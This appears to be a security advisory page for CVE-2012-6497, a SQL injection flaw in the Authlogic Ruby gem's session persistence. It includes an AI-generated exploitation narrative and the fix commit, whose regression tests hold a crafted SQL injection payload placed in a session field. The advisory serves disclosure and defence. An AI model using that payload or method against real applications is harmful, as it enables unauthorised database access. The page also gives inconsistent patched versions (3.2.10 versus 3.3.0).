VYPR
← All advisories
Moderate severityNVD Advisory· Published Jan 4, 2013· Updated Apr 29, 2026

CVE-2012-6497

CVE-2012-6497

Description

The Authlogic gem for Ruby on Rails, when used with certain versions before 3.2.10, makes potentially unsafe find_by_id method calls, which might allow remote attackers to conduct CVE-2012-6496 SQL injection attacks via a crafted parameter in environments that have a known secret_token value, as demonstrated by a value contained in secret_token.rb in an open-source product.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Authlogic gem < 3.2.10 calls unsafe find_by_id, enabling SQL injection via crafted params when the secret_token is known.

Vulnerability

The Authlogic gem for Ruby on Rails, prior to version 3.2.10, makes potentially unsafe find_by_id method calls. In environments where the application's secret_token value is known (e.g., exposed in open-source secret_token.rb files), remote attackers can craft malicious parameters to perform SQL injection attacks. The issue is directly related to CVE-2012-6496 and allows exploitation when the secret token allows session tampering [1] [2].

Exploitation

An attacker needs knowledge of the application's secret_token value. With this token, the attacker can forge a session cookie that injects a crafted parameter (such as id[] or similar) into the call chain. When Authlogic uses the forged session data to call find_by_id, the malicious parameter leads to SQL injection. The exploitation requires no authentication, as the session cookie is manipulated externally [3] [4].

Impact

Successful exploitation allows remote attackers to execute arbitrary SQL queries against the database. This can result in unauthorized access to sensitive data, data modification, or complete compromise of the database. The attacker gains the ability to read or write any database record, potentially escalating to broader system control [1] [2].

Mitigation

Users should upgrade to Authlogic gem version 3.2.10 or later, which addresses unsafe find_by_id calls by properly sanitizing inputs. The fix was released in early 2013. As a general best practice, secret tokens should not be exposed in public code repositories or open-source products [1] [4]. No workaround other than upgrading is recommended.

References
  1. GitHub - binarylogic/authlogic: A simple ruby authentication solution.
  2. NVD - CVE-2012-6497
  3. security - Re: SQL Injection Vulnerability in Ruby on Rails (CVE-2012-5664)
  4. Let Me Github That For You

AI Insight generated on May 23, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
authlogicRubyGems
< 3.3.03.3.0

Affected products

3

Patches

1
1d57a6c4abe4

Fix session persistence sql vulnerabilities

https://github.com/binarylogic/authlogicTieg ZahariaDec 28, 2012via ghsa
commit
2 files changed · +20 2
  • lib/authlogic/session/session.rb+2 2 modified
    @@ -35,8 +35,8 @@ def persist_by_session
               # Allow finding by persistence token, because when records are created the session is maintained in a before_save, when there is no id.
               # This is done for performance reasons and to save on queries.
               record = record_id.nil? ?
-                search_for_record("find_by_persistence_token", persistence_token) :
-                search_for_record("find_by_#{klass.primary_key}", record_id)
+                search_for_record("find_by_persistence_token", persistence_token.to_s) :
+                search_for_record("find_by_#{klass.primary_key}", record_id.to_s)
               self.unauthorized_record = record if record && record.persistence_token == persistence_token
               valid?
             else
  • test/session_test/session_test.rb+18 0 modified
    @@ -20,6 +20,24 @@ def test_persist_persist_by_session
         assert_equal ben, session.record
         assert_equal ben.persistence_token, controller.session["user_credentials"]
       end
+
+      def test_persist_persist_by_session_with_session_fixation_attack
+        ben = users(:ben)
+        controller.session["user_credentials"] = 'neo'
+        controller.session["user_credentials_id"] = {:select => " *,'neo' AS persistence_token FROM users WHERE id = #{ben.id} limit 1 -- "}
+        @user_session = UserSession.find
+        assert @user_session.blank?
+      end
+
+      def test_persist_persist_by_session_with_sql_injection_attack
+        ben = users(:ben)
+        controller.session["user_credentials"] = {:select => "ABRA CADABRA"}
+        controller.session["user_credentials_id"] = nil
+        assert_nothing_raised do
+          @user_session = UserSession.find
+        end
+        assert @user_session.blank?
+      end
       
       def test_persist_persist_by_session_with_token_only
         ben = users(:ben)

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

11

News mentions

0

No linked articles in our index yet.